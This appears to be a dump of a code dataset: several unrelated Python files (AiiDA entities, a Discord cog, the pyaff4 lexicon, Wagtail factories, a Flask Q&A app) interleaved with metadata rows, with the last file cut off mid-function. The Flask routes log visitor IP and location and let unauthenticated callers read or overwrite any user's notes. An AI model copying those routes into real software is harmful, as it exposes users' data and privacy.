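# .ok and .headers the way requests.Response does.
def _extract_order_id_sketch(response, account_id):
    import re
    if not response.ok:
        raise ValueError('order not successful')
    location = response.headers.get('Location')
    if location is None:
        return None
    match = re.search(r'/accounts/(\d+)/orders/(\d+)$', location)
    if match is None:
        return None
    if int(match.group(1)) != account_id:
        raise ValueError('order request account ID != Utils.account_id')
    return int(match.group(2))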
| 37.806763
| 80
| 0.625607
| 7,643
| 0.976616
| 0
| 0
| 0
| 0
| 0
| 0
| 1,678
| 0.214413
|
65ae5ae925181ff1d726f472dfbdd87ce820d687
| 9,535
|
py
|
Python
|
aiida/orm/entities.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | 1
|
2019-07-31T04:08:13.000Z
|
2019-07-31T04:08:13.000Z
|
aiida/orm/entities.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
aiida/orm/entities.py
|
PercivalN/aiida-core
|
b215ed5a7ce9342bb7f671b67e95c1f474cc5940
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Module for all common top level AiiDA entity classes and methods"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import typing
from plumpy.base.utils import super_check, call_with_super_check
from aiida.common import exceptions
from aiida.common import datastructures
from aiida.common.lang import classproperty, type_check
from aiida.manage.manager import get_manager
__all__ = ('Entity', 'Collection')
EntityType = typing.TypeVar('EntityType') # pylint: disable=invalid-name
class Collection(typing.Generic[EntityType]): # pylint: disable=unsubscriptable-object
"""Container class that represents the collection of objects of a particular type."""
# A store for any backend specific collections that already exist
_COLLECTIONS = datastructures.LazyStore()
@classmethod
def get_collection(cls, entity_type, backend):
"""
Get the collection for a given entity type and backend instance
:param entity_type: the entity type e.g. User, Computer, etc
:type entity_type: :class:`aiida.orm.Entity`
:param backend: the backend instance to get the collection for
:type backend: :class:`aiida.orm.implementation.Backend`
:return: a new collection with the new backend
:rtype: :class:`aiida.orm.Collection`
"""
# Lazily get the collection i.e. create only if we haven't done so yet
return cls._COLLECTIONS.get((entity_type, backend), lambda: entity_type.Collection(backend, entity_type))
def __init__(self, backend, entity_class):
""" Construct a new entity collection.
:param backend: the backend instance to get the collection for
:type backend: :class:`aiida.orm.implementation.Backend`
:param entity_class: the entity type e.g. User, Computer, etc
:type entity_class: :class:`aiida.orm.Entity`
"""
assert issubclass(entity_class, Entity), "Must provide an entity type"
self._backend = backend or get_manager().get_backend()
self._entity_type = entity_class
def __call__(self, backend):
""" Create a new objects collection using a new backend.
:param backend: the backend instance to get the collection for
:type backend: :class:`aiida.orm.implementation.Backend`
:return: a new collection with the new backend
:rtype: :class:`aiida.orm.Collection`
"""
if backend is self._backend:
# Special case if they actually want the same collection
return self
return self.get_collection(self.entity_type, backend)
@property
def backend(self):
"""Return the backend.
:return: the backend instance of this collection
:rtype: :class:`aiida.orm.implementation.Backend`
"""
return self._backend
@property
def entity_type(self):
"""The entity type.
:rtype: :class:`aiida.orm.Entity`
"""
return self._entity_type
def query(self):
"""
Get a query builder for the objects of this collection
:return: a new query builder instance
:rtype: :class:`aiida.orm.QueryBuilder`
"""
# pylint: disable=no-self-use
from . import querybuilder
query = querybuilder.QueryBuilder()
query.append(self._entity_type, project='*')
return query
def get(self, **filters):
"""
Get a single collection entry that matches the filter criteria
:param filters: the filters identifying the object to get
:type filters: dict
:return: the entry
"""
res = self.find(filters=filters)
if not res:
raise exceptions.NotExistent("No {} with filter '{}' found".format(self.entity_type.__name__, filters))
if len(res) > 1:
raise exceptions.MultipleObjectsError("Multiple {}s found with the same id '{}'".format(
self.entity_type.__name__, id))
return res[0]
def find(self, filters=None, order_by=None, limit=None):
"""
Find collection entries matching the filter criteria
:param filters: the keyword value pair filters to match
:type filters: dict
:param order_by: a list of (key, direction) pairs specifying the sort order
:type order_by: list
:param limit: the maximum number of results to return
:type limit: int
:return: a list of resulting matches
:rtype: list
"""
query = self.query()
filters = filters or {}
query.add_filter(self.entity_type, filters)
if order_by:
query.order_by({self.entity_type: order_by})
if limit:
query.limit(limit)
return [_[0] for _ in query.all()]
def all(self):
"""
Get all entities in this collection
:return: A collection of users matching the criteria
:rtype: list
"""
return [_[0] for _ in self.query().all()]
class Entity(object): # pylint: disable=useless-object-inheritance
"""An AiiDA entity"""
_objects = None
# Define our collection type
Collection = Collection
@classproperty
def objects(cls, backend=None): # pylint: disable=no-self-use, no-self-argument
"""
Get a collection for objects of this type.
:param backend: the optional backend to use (otherwise use default)
:type backend: :class:`aiida.orm.implementation.Backend`
:return: an object that can be used to access entities of this type
:rtype: :class:`aiida.orm.Collection`
"""
backend = backend or get_manager().get_backend()
return cls.Collection.get_collection(cls, backend)
@classmethod
def get(cls, **kwargs):
# pylint: disable=redefined-builtin, invalid-name
return cls.objects.get(**kwargs) # pylint: disable=no-member
@classmethod
def from_backend_entity(cls, backend_entity):
"""
Construct an entity from a backend entity instance
:param backend_entity: the backend entity
:return: an AiiDA entity instance
"""
from . import implementation
type_check(backend_entity, implementation.BackendEntity)
entity = cls.__new__(cls)
entity.init_from_backend(backend_entity)
call_with_super_check(entity.initialize)
return entity
def __init__(self, backend_entity):
"""
:param backend_entity: the backend model supporting this entity
:type backend_entity: :class:`aiida.orm.implementation.BackendEntity`
"""
self._backend_entity = backend_entity
call_with_super_check(self.initialize)
def init_from_backend(self, backend_entity):
"""
:param backend_entity: the backend model supporting this entity
:type backend_entity: :class:`aiida.orm.implementation.BackendEntity`
"""
self._backend_entity = backend_entity
@super_check
def initialize(self):
"""Initialize instance attributes.
This will be called after the constructor is called or an entity is created from an existing backend entity.
"""
@property
def id(self):
"""Return the id for this entity.
This identifier is guaranteed to be unique amongst entities of the same type for a single backend instance.
:return: the entity's id
"""
# pylint: disable=redefined-builtin, invalid-name
return self._backend_entity.id
@property
def pk(self):
"""Return the primary key for this entity.
This identifier is guaranteed to be unique amongst entities of the same type for a single backend instance.
:return: the entity's principal key
"""
return self.id
@property
def uuid(self):
"""Return the UUID for this entity.
This identifier is unique across all entities types and backend instances.
:return: the entity uuid
:rtype: :class:`uuid.UUID`
"""
return self._backend_entity.uuid
def store(self):
"""Store the entity."""
self._backend_entity.store()
return self
@property
def is_stored(self):
"""Return whether the entity is stored.
:return: boolean, True if stored, False otherwise
:rtype: bool
"""
return self._backend_entity.is_stored
@property
def backend(self):
"""
Get the backend for this entity
:return: the backend instance
"""
return self._backend_entity.backend
@property
def backend_entity(self):
"""
Get the implementing class for this object
:return: the class model
"""
return self._backend_entity
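# Usage sketch (assumption, not part of this module): every concrete entity
# subclass inherits the collection API shown above, e.g. for aiida.orm.User:
#
#   from aiida import orm
#   user = orm.User.objects.get(email='alice@example.com')  # one match or NotExistent
#   some = orm.User.objects.find(limit=10)                   # filtered list
#   everyone = orm.User.objects.all()
#
# The email value is illustrative only; a configured AiiDA profile is required.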
| 32.431973
| 116
| 0.627687
| 8,347
| 0.875406
| 0
| 0
| 3,981
| 0.417514
| 0
| 0
| 5,676
| 0.595281
|
65ae685c4283988c38775f88a233b7c8ac475f6e
| 2,088
|
py
|
Python
|
src/fullyautomatednutcracker/cogs/antiselfdeprecation.py
|
dovedevic/fullyautomatednutcracker
|
c746601f93097b88febea64adb09be5ef569adaa
|
[
"MIT"
] | 5
|
2020-08-12T00:30:03.000Z
|
2020-08-24T08:24:34.000Z
|
src/fullyautomatednutcracker/cogs/antiselfdeprecation.py
|
dovedevic/fullyautomatednutcracker
|
c746601f93097b88febea64adb09be5ef569adaa
|
[
"MIT"
] | 3
|
2020-08-12T19:25:00.000Z
|
2020-08-28T00:23:18.000Z
|
src/fullyautomatednutcracker/cogs/antiselfdeprecation.py
|
dovedevic/fullyautomatednutcracker
|
c746601f93097b88febea64adb09be5ef569adaa
|
[
"MIT"
] | 8
|
2020-08-12T00:37:03.000Z
|
2020-08-20T19:49:32.000Z
|
from discord.ext import commands
import asyncio
import time
class AntiSelfDeprecation(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.bot.nono_words = []
self.dumb = ('im dumb', 'i\'m dumb', 'im stupid', 'i\'m stupid')
self.not_dumb = ('im not dumb', 'i\'m not dumb', 'i\'m not stupid', 'im not stupid')
self.bot.deny = ['shut', 'shut up', 'up shut']
@commands.Cog.listener()
async def on_message(self, message):
if message.content.lower() in self.bot.nono_words:
await message.channel.send("You're a good person and can't change my mind smh")
elif message.content.lower().startswith(self.dumb):
await message.channel.send('You\'re not dumb, you\'re learning')
try:
m = await self.bot.wait_for('message', check=lambda msg: msg.author.id == message.author.id and msg.channel == message.channel and msg.content.lower() in self.bot.deny, timeout=10.0)
await m.channel.send('no u')
except asyncio.TimeoutError:
return
elif message.content.lower().startswith(self.not_dumb):
await message.channel.send('Correct.')
    # Listener methods need unique names inside a cog, otherwise later
    # definitions shadow the earlier ones in the class body; the event name is
    # passed to the decorator explicitly instead.
    @commands.Cog.listener('on_message')
    async def on_yoshi_message(self, message):
if message.content.lower() == 'yoshi man good':
await message.add_reaction('\U0001F49A')
    # bump reminder: waits 2 hours (7200 s) after a successful Disboard bump
    @commands.Cog.listener('on_message')
    async def on_bump_message(self, message):
if message.author.id == 302050872383242240 and len(message.embeds) > 0 and 'Bump done' in message.embeds[0].description:
bumped = time.monotonic()
self.last_bumped = bumped
await message.add_reaction('👍')
await asyncio.sleep(7200)
if self.last_bumped == bumped:
await message.channel.send('<a:filterfeed:693001359934357563> No one\'s bumped our server in over two hours! Disboard keeps us up on the front page! Use `/bump` to bump us!')
def setup(bot):
bot.add_cog(AntiSelfDeprecation(bot))
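# Usage sketch (assumption, not part of the cog): registering this extension
# on a discord.py 1.x bot; the module path below is hypothetical.
#
#   bot = commands.Bot(command_prefix='!')
#   bot.load_extension('cogs.antiselfdeprecation')
#   bot.run('TOKEN')  # token intentionally omitted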
| 43.5
| 198
| 0.632184
| 1,967
| 0.940698
| 0
| 0
| 1,556
| 0.744142
| 1,469
| 0.702535
| 473
| 0.226208
|
65aee5c9340fded7e6ab5b1f35346dad94ab5fed
| 10,809
|
py
|
Python
|
pyaff4/lexicon.py
|
timbolle-unil/pyaff4
|
845bec2dc7a274766e3c9a96adf10a812a925cd7
|
[
"Apache-2.0"
] | null | null | null |
pyaff4/lexicon.py
|
timbolle-unil/pyaff4
|
845bec2dc7a274766e3c9a96adf10a812a925cd7
|
[
"Apache-2.0"
] | null | null | null |
pyaff4/lexicon.py
|
timbolle-unil/pyaff4
|
845bec2dc7a274766e3c9a96adf10a812a925cd7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""The AFF4 lexicon."""
from __future__ import unicode_literals
# This is the version of the AFF4 specification we support - not the library
# version itself.
from builtins import object
import rdflib
from pyaff4 import rdfvalue
AFF4_VERSION = "0.2"
AFF4_MAX_READ_LEN = 1024*1024*100
AFF4_NAMESPACE = "http://aff4.org/Schema#"
AFF4_LEGACY_NAMESPACE = "http://afflib.org/2009/aff4#"
XSD_NAMESPACE = "http://www.w3.org/2001/XMLSchema#"
RDF_NAMESPACE = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
AFF4_MEMORY_NAMESPACE = "http://aff4.org/Schema#memory/"
AFF4_DISK_NAMESPACE = "http://aff4.org/Schema#disk/"
AFF4_MACOS_NAMESPACE = "http://aff4.org/Schema#macos/"
# Attributes in this namespace will never be written to persistent
# storage. They are simply used as a way for storing metadata about an AFF4
# object internally.
AFF4_VOLATILE_NAMESPACE = "http://aff4.org/VolatileSchema#"
# The configuration space of the library itself. All these should be volatile
# and therefore not persistent or interoperable with other AFF4 implementations.
AFF4_CONFIG_NAMESPACE = AFF4_NAMESPACE + "config"
# Location of the cache (contains AFF4_FILE_NAME)
AFF4_CONFIG_CACHE_DIR = AFF4_CONFIG_NAMESPACE + "/cache"
# Commonly used RDF types.
URNType = "URN"
XSDStringType = (XSD_NAMESPACE + "string")
RDFBytesType = (XSD_NAMESPACE + "hexBinary")
XSDIntegerType = (XSD_NAMESPACE + "integer")
XSDIntegerTypeInt = (XSD_NAMESPACE + "int")
XSDIntegerTypeLong = (XSD_NAMESPACE + "long")
XSDBooleanType = (XSD_NAMESPACE + "boolean")
# Attribute names for different AFF4 objects.
# Base AFF4Object
AFF4_TYPE = (RDF_NAMESPACE + "type")
AFF4_STORED = (AFF4_NAMESPACE + "stored")
AFF4_CONTAINS = (AFF4_NAMESPACE + "contains")
# Each container should have this file which contains the URN of the container.
AFF4_CONTAINER_DESCRIPTION = "container.description"
AFF4_CONTAINER_INFO_TURTLE = "information.turtle"
AFF4_CONTAINER_INFO_YAML = "information.yaml"
# AFF4 ZipFile containers.
AFF4_ZIP_TYPE = (AFF4_NAMESPACE + "zip_volume")
# AFF4Stream
AFF4_STREAM_SIZE = (AFF4_NAMESPACE + "size")
AFF4_LEGACY_STREAM_SIZE = (AFF4_LEGACY_NAMESPACE + "size")
# The original filename the stream had.
AFF4_STREAM_ORIGINAL_FILENAME = (AFF4_NAMESPACE + "original_filename")
# Can be "read", "truncate", "append"
AFF4_STREAM_WRITE_MODE = (AFF4_VOLATILE_NAMESPACE + "writable")
# FileBackedObjects are either marked explicitly or using the file:// scheme.
AFF4_FILE_TYPE = (AFF4_NAMESPACE + "file")
# file:// based URNs do not always have a direct mapping to filesystem
# paths. This volatile attribute is used to control the filename mapping.
AFF4_FILE_NAME = (AFF4_VOLATILE_NAMESPACE + "filename")
# The original filename the stream had.
AFF4_STREAM_ORIGINAL_FILENAME = (AFF4_NAMESPACE + "original_filename")
# ZipFileSegment
AFF4_ZIP_SEGMENT_TYPE = (AFF4_NAMESPACE + "zip_segment")
# ZipStoredLogicalStream
AFF4_ZIP_SEGMENT_IMAGE_TYPE = (AFF4_NAMESPACE + "ZipSegment")
AFF4_FILEIMAGE = (AFF4_NAMESPACE + "FileImage")
# AFF4 Image Stream - stores a stream using Bevies.
AFF4_IMAGE_TYPE = (AFF4_NAMESPACE + "ImageStream")
AFF4_LEGACY_IMAGE_TYPE = (AFF4_LEGACY_NAMESPACE + "stream")
AFF4_SCUDETTE_IMAGE_TYPE = (AFF4_NAMESPACE + "image")
AFF4_IMAGE_CHUNK_SIZE = (AFF4_NAMESPACE + "chunkSize")
AFF4_LEGACY_IMAGE_CHUNK_SIZE = (AFF4_LEGACY_NAMESPACE + "chunkSize")
AFF4_IMAGE_CHUNKS_PER_SEGMENT = (AFF4_NAMESPACE + "chunksInSegment")
AFF4_LEGACY_IMAGE_CHUNKS_PER_SEGMENT = (AFF4_LEGACY_NAMESPACE + "chunksInSegment")
AFF4_IMAGE_COMPRESSION = (AFF4_NAMESPACE + "compressionMethod")
AFF4_LEGACY_IMAGE_COMPRESSION = (AFF4_LEGACY_NAMESPACE + "CompressionMethod")
AFF4_IMAGE_COMPRESSION_ZLIB = "https://www.ietf.org/rfc/rfc1950.txt"
AFF4_IMAGE_COMPRESSION_SNAPPY = "http://code.google.com/p/snappy/"
AFF4_IMAGE_COMPRESSION_SNAPPY_SCUDETTE = "https://github.com/google/snappy"
AFF4_IMAGE_COMPRESSION_STORED = (AFF4_NAMESPACE + "compression/stored")
AFF4_IMAGE_AES_XTS = "https://doi.org/10.1109/IEEESTD.2008.4493450"
# AFF4Map - stores a mapping from one stream to another.
AFF4_MAP_TYPE = (AFF4_NAMESPACE + "Map")
AFF4_LEGACY_MAP_TYPE = (AFF4_LEGACY_NAMESPACE + "map")
AFF4_SCUDETTE_MAP_TYPE = (AFF4_NAMESPACE + "map")
# Encrypted Streams
AFF4_ENCRYPTEDSTREAM_TYPE = (AFF4_NAMESPACE + "EncryptedStream")
AFF4_RANDOMSTREAM_TYPE = (AFF4_NAMESPACE + "RandomAccessImageStream")
AFF4_KEYBAG = (AFF4_NAMESPACE + "keyBag")
AFF4_WRAPPEDKEY = (AFF4_NAMESPACE + "wrappedKey")
AFF4_SALT = (AFF4_NAMESPACE + "salt")
AFF4_ITERATIONS = (AFF4_NAMESPACE + "iterations")
AFF4_KEYSIZEBYTES = (AFF4_NAMESPACE + "keySizeInBytes")
AFF4_CERT_ENCRYPTED_KEYBAG = (AFF4_NAMESPACE + "PublicKeyEncryptedKeyBag")
AFF4_PASSWORD_WRAPPED_KEYBAG = (AFF4_NAMESPACE + "PasswordWrappedKeyBag")
AFF4_SERIALNUMBER = (AFF4_NAMESPACE + "serialNumber")
AFF4_SUBJECTNAME = (AFF4_NAMESPACE + "x509SubjectName")
# Categories describe the general type of an image.
AFF4_CATEGORY = (AFF4_NAMESPACE + "category")
# These represent standard attributes to describe memory forensics images.
AFF4_MEMORY_PHYSICAL = (AFF4_MEMORY_NAMESPACE + "physical")
AFF4_MEMORY_VIRTUAL = (AFF4_MEMORY_NAMESPACE + "virtual")
AFF4_MEMORY_PAGEFILE = (AFF4_MEMORY_NAMESPACE + "pagefile")
AFF4_MEMORY_PAGEFILE_NUM = (AFF4_MEMORY_NAMESPACE + "pagefile_number")
AFF4_DISK_RAW = (AFF4_DISK_NAMESPACE + "raw")
AFF4_DISK_PARTITION = (AFF4_DISK_NAMESPACE + "partition")
AFF4_DIRECTORY_TYPE = (AFF4_NAMESPACE + "directory")
# The constant stream is a pseudo stream which just returns a constant.
AFF4_CONSTANT_TYPE = (AFF4_NAMESPACE + "constant")
# The constant to repeat (default 0).
AFF4_CONSTANT_CHAR = (AFF4_NAMESPACE + "constant_char")
# An AFF4 Directory stores all members as files on the filesystem. Some
# filesystems can not represent the URNs properly, hence we need a mapping
# between the URN and the filename. This attribute stores the _relative_ path
# of the filename for the member URN relative to the container's path.
AFF4_DIRECTORY_CHILD_FILENAME = (AFF4_NAMESPACE + "directory/filename")
HASH_SHA512 = rdflib.URIRef("http://aff4.org/Schema#SHA512")
HASH_SHA256 = rdflib.URIRef("http://aff4.org/Schema#SHA256")
HASH_SHA1 = rdflib.URIRef("http://aff4.org/Schema#SHA1")
HASH_MD5 = rdflib.URIRef("http://aff4.org/Schema#MD5")
HASH_BLAKE2B = rdflib.URIRef("http://aff4.org/Schema#Blake2b")
HASH_BLOCKMAPHASH_SHA512 = rdflib.URIRef("http://aff4.org/Schema#blockMapHashSHA512")
class Lexicon(object):
def __init__(self):
pass
def of(self, end):
return self.base + end
class StdLexicon(Lexicon):
base = AFF4_NAMESPACE
map = base + "Map"
Image = base + "Image"
stored = base + "stored"
target = base + "target"
contains = base + "contains"
dataStream = base + "dataStream"
blockMapHash = base + "blockMapHash"
dependentStream = base + "dependentStream"
mapPointHash = base + "mapPointHash"
mapIdxHash = base + "mapIdxHash"
mapPathHash = base + "mapPathHash"
blockHashesHash = base + "blockHashesHash"
mapHash = base + "mapHash"
hash = base + "hash"
chunksPerSegment = base + "chunksInSegment"
chunkSize = base + "chunkSize"
streamSize = base + "size"
compressionMethod = base + "compressionMethod"
memoryPageTableEntryOffset = base + "memoryPageTableEntryOffset"
ntKernelBase = base + "NTKernelBase"
OSXKernelPhysicalOffset = base + "OSXKernelPhysicalOffset"
OSXKALSRSlide = base + "OSXKALSRSlide"
OSXDTBPhysicalOffset = base + "OSXDTBPhysicalOffset"
class Std11Lexicon(StdLexicon):
base = AFF4_NAMESPACE
FileImage = base + "FileImage"
FolderImage = base + "Folder"
lastWritten = base+ "lastWritten"
lastAccessed = base + "lastAccessed"
recordChanged = base + "recordChanged"
birthTime = base + "birthTime"
pathName = base + "originalFileName"
collidingDataStream = base + "collidingDataStream"
child = base + "child"
LogicalAcquisitionTask = base + "LogicalAcquisitionTask"
filesystemRoot = base + "filesystemRoot"
keyBag = AFF4_KEYBAG
salt = AFF4_SALT
iterations = AFF4_ITERATIONS
keySizeInBytes = AFF4_KEYSIZEBYTES
wrappedKey = AFF4_WRAPPEDKEY
EncryptedStream = AFF4_ENCRYPTEDSTREAM_TYPE
CertEncryptedKeyBag = AFF4_CERT_ENCRYPTED_KEYBAG
PasswordWrappedKeyBag = AFF4_PASSWORD_WRAPPED_KEYBAG
serialNumber = AFF4_SERIALNUMBER
subjectName = AFF4_SUBJECTNAME
class LegacyLexicon(Lexicon):
base = AFF4_LEGACY_NAMESPACE
map = base + "map"
stored = base + "stored"
Image = base + "Image"
blockHashesHash = base + "blockHashesHash"
mapPointHash = base + "mapPointHash"
mapIdxHash = base + "mapIdxHash"
mapPathHash = base + "mapPathHash"
mapHash = base + "mapHash"
hash = base + "hash"
chunksPerSegment = base + "chunksInSegment"
chunkSize = base + "chunkSize"
streamSize = base + "size"
compressionMethod = base + "CompressionMethod"
class ScudetteLexicon(Lexicon):
base = AFF4_NAMESPACE
map = base + "map"
stored = base + "stored"
Image = base + "Image"
blockHashesHash = base + "blockHashesHash"
mapPointHash = base + "mapPointHash"
mapIdxHash = base + "mapIdxHash"
mapPathHash = base + "mapPathHash"
mapHash = base + "mapHash"
hash = base + "hash"
chunksPerSegment = base + "chunks_per_segment"
chunkSize = base + "chunk_size"
streamSize = base + "size"
compressionMethod = base + "compression"
category = base + "category"
memoryPhysical = "http://aff4.org/Schema#memory/physical"
# early logical imaging support for pmem
class PmemLogicalPreStd(StdLexicon):
pathName = (AFF4_NAMESPACE + "original_filename")
legacy = LegacyLexicon()
standard = StdLexicon()
scudette = ScudetteLexicon()
standard11 = Std11Lexicon()
pmemlogical = PmemLogicalPreStd()
def AutoResolveAttribute(resolver, urn, attribute):
"""Iterate over all lexicons to autodetect the attribute."""
for lexicon in (standard, scudette, legacy):
result = resolver.Get(urn, getattr(lexicon, attribute))
if result is not None:
return result
transient_graph = rdfvalue.URN("http://aff4.org/Schema#transient")
any = rdfvalue.URN("http://aff4.org/Schema#any")
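# Usage sketch (assumption, not part of the lexicon module): the lexicon
# classes simply concatenate their base namespace with an attribute name, and
# AutoResolveAttribute tries each dialect in turn against a caller-supplied
# resolver ('resolver' and 'image_urn' below are hypothetical).
assert standard.of("size") == AFF4_STREAM_SIZE
assert legacy.chunkSize == AFF4_LEGACY_NAMESPACE + "chunkSize"
# size = AutoResolveAttribute(resolver, image_urn, "streamSize")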
| 38.603571
| 85
| 0.753261
| 3,217
| 0.297622
| 0
| 0
| 0
| 0
| 0
| 0
| 4,629
| 0.428254
|
65af59058300b104393557367f8057f6940196d0
| 431
|
py
|
Python
|
dusted/dustforce/linux.py
|
AlexMorson/dustforce-tas-editor
|
80546ca525ba215252c23a74807857e9c7c2566c
|
[
"MIT"
] | 1
|
2021-03-20T07:43:33.000Z
|
2021-03-20T07:43:33.000Z
|
dusted/dustforce/linux.py
|
AlexMorson/dustforce-tas-editor
|
80546ca525ba215252c23a74807857e9c7c2566c
|
[
"MIT"
] | null | null | null |
dusted/dustforce/linux.py
|
AlexMorson/dustforce-tas-editor
|
80546ca525ba215252c23a74807857e9c7c2566c
|
[
"MIT"
] | null | null | null |
import queue
import threading
from subprocess import PIPE, Popen
procs = []
stdout = queue.Queue()
def process_stdout(proc):
    # Stream the child's stdout into the shared queue until EOF, then drop the
    # finished process from the registry.
    while (line := proc.stdout.readline()) != b"":
        stdout.put(line.decode().strip())
    procs.remove(proc)
def create_proc(uri):
    # Open the URI with the desktop handler (unbuffered so output arrives
    # line-by-line) and drain its stdout on a background thread.
    proc = Popen(["unbuffer", "xdg-open", uri], stdout=PIPE, stderr=PIPE)
    procs.append(proc)
    threading.Thread(target=lambda: process_stdout(proc)).start()
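# Usage sketch (assumption): open a level URI through the desktop handler and
# print whatever the launched process writes; the URI is purely illustrative
# and the 'unbuffer' / 'xdg-open' binaries must be available on the system.
if __name__ == "__main__":
    create_proc("dustforce://example")  # hypothetical URI
    while procs:
        try:
            print(stdout.get(timeout=1.0))
        except queue.Empty:
            pass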
| 22.684211
| 73
| 0.679814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.053364
|
65afb03352fe6b2c1a60ffb0e33ef381c9954df6
| 1,834
|
py
|
Python
|
joplin/pages/official_documents_page/factories.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 15
|
2018-09-27T07:36:30.000Z
|
2021-08-03T16:01:21.000Z
|
joplin/pages/official_documents_page/factories.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 183
|
2017-11-16T23:30:47.000Z
|
2020-12-18T21:43:36.000Z
|
joplin/pages/official_documents_page/factories.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 12
|
2017-12-12T22:48:05.000Z
|
2021-03-01T18:01:24.000Z
|
import factory
from pages.official_documents_page.models import OfficialDocumentPage, OfficialDocumentCollectionOfficialDocumentPage
from pages.base_page.factories import JanisBasePageFactory
from pages.official_documents_collection.factories import OfficialDocumentCollectionFactory
from wagtail.documents.models import Document
class DocumentFactory(factory.DjangoModelFactory):
@classmethod
def create(cls, *args, **kwargs):
return super(DocumentFactory, cls).create(*args, **kwargs)
class Meta:
model = Document
class OfficialDocumentCollectionDocumentFactory(factory.django.DjangoModelFactory):
page = factory.SubFactory(
'official_documents_page.factories.OfficialDocumentPageFactory',
add_departments__dummy=False,
)
official_document_collection = factory.SubFactory(
OfficialDocumentCollectionFactory,
add_departments__dummy=False,
)
class Meta:
model = OfficialDocumentCollectionOfficialDocumentPage
class OfficialDocumentPageFactory(JanisBasePageFactory):
class Meta:
model = OfficialDocumentPage
# document = factory.SubFactory(
# DocumentFactory
# )
@factory.post_generation
def add_official_document_collection(self, create, extracted, **kwargs):
if extracted:
# A list of official document collections were passed in, use them
for collection in extracted['official_document_collection']:
OfficialDocumentCollectionDocumentFactory.create(page=self, official_document_collection=collection)
return
# pass "add_topics__dummy"=True into Factory() to make dummy document collections
if create:
if kwargs.get("dummy", False):
                OfficialDocumentCollectionDocumentFactory.create_batch(2, page=self)  # link via the through-model factory
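# Usage sketch (assumption, for illustration only):
#
#   page = OfficialDocumentPageFactory.create(
#       add_official_document_collection__dummy=True)      # two dummy collections
#
#   collections = OfficialDocumentCollectionFactory.create_batch(2)
#   page = OfficialDocumentPageFactory.create(
#       add_official_document_collection={
#           'official_document_collection': collections})  # link existing ones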
| 35.960784
| 117
| 0.745911
| 1,495
| 0.815158
| 0
| 0
| 758
| 0.413304
| 0
| 0
| 303
| 0.165213
|
65b0c43d10ec56796ba655b95a3c9d479381e676
| 6,927
|
py
|
Python
|
flask_qa/routes/main.py
|
gouravdhar/youtube_video_code
|
ade7b8dded7992149d34137f801ebe9c26e9bcf0
|
[
"Unlicense"
] | null | null | null |
flask_qa/routes/main.py
|
gouravdhar/youtube_video_code
|
ade7b8dded7992149d34137f801ebe9c26e9bcf0
|
[
"Unlicense"
] | null | null | null |
flask_qa/routes/main.py
|
gouravdhar/youtube_video_code
|
ade7b8dded7992149d34137f801ebe9c26e9bcf0
|
[
"Unlicense"
] | null | null | null |
from flask import Blueprint, render_template, request, redirect, url_for
from flask_login import current_user, login_required
from flask_cors import CORS
from flask_qa.extensions import db
from flask_qa.models import Question, User, Stats, Notes
import json
main = Blueprint('main', __name__)
@main.route('/')
def index():
questions = Question.query.filter(Question.answer != None).all()
context = {
'questions' : questions
}
return render_template('home.html', **context)
@main.route('/ask', methods=['GET', 'POST'])
@login_required
def ask():
if request.method == 'POST':
question = request.form['question']
expert = request.form['expert']
question = Question(
question=question,
expert_id=expert,
asked_by_id=current_user.id
)
db.session.add(question)
db.session.commit()
return redirect(url_for('main.index'))
experts = User.query.filter_by(expert=True).all()
context = {
'experts' : experts
}
return render_template('ask.html', **context)
@main.route('/api', methods=['POST'])
def apiToPostStats():
if request.method == 'POST':
ip = request.form["ip"]
loc = request.form["loc"]
city = request.form["city"]
country = request.form["country"]
org = request.form["org"]
postal = request.form["postal"]
region = request.form["region"]
timezone = request.form["timezone"]
time = request.form["time"]
stats = Stats(
ip = ip,
loc = loc,
city = city,
country = country,
org = org,
postal = postal,
region = region,
timezone = timezone,
time = time
)
db.session.add(stats)
db.session.commit()
return "okay", 200
    return "method not allowed", 405
@main.route('/api/postNotes', methods=['POST', 'GET'])
def apiToPostNotes():
if request.method == 'POST':
# id = request.form["id"]
userName = request.form["username"]
notesEntry = request.form["notes"]
notesRow = Notes.query.filter_by(username=userName).first()
if not notesRow:
notes=Notes(
notes=notesEntry,
username=userName
)
db.session.add(notes)
db.session.commit()
else:
idRow=notesRow.id
notesRow.notes = notesEntry
db.session.commit()
# if not notesRow:
# notes = Notes(
# notes = notesEntry,
# username = username
# )
# db.session.add(notes)
# db.session.commit()
# else:
# id = notesRow.id
# notes = Notes(
# id=id;
# notes = notesEntry,
# username = username
# )
# db.session.add(notes)
# db.session.commit()
return "okay", 200
    return "method not allowed", 405
@main.route('/api/getNotes/<userName>', methods=['GET'])
def apiToGetNotes(userName):
if request.method == 'GET':
notes = Notes.query.filter_by(username=userName).first()
if not notes:
newNotes = Notes(
notes = '[]',
username=userName
)
db.session.add(newNotes)
db.session.commit()
return json.dumps(newNotes.notes), 200
return json.dumps(notes.notes), 200
return 'hi',200
@main.route('/api/coord', methods=['GET'])
def apiToGetCoords():
if request.method == 'GET':
stats = Stats.query.filter().all()
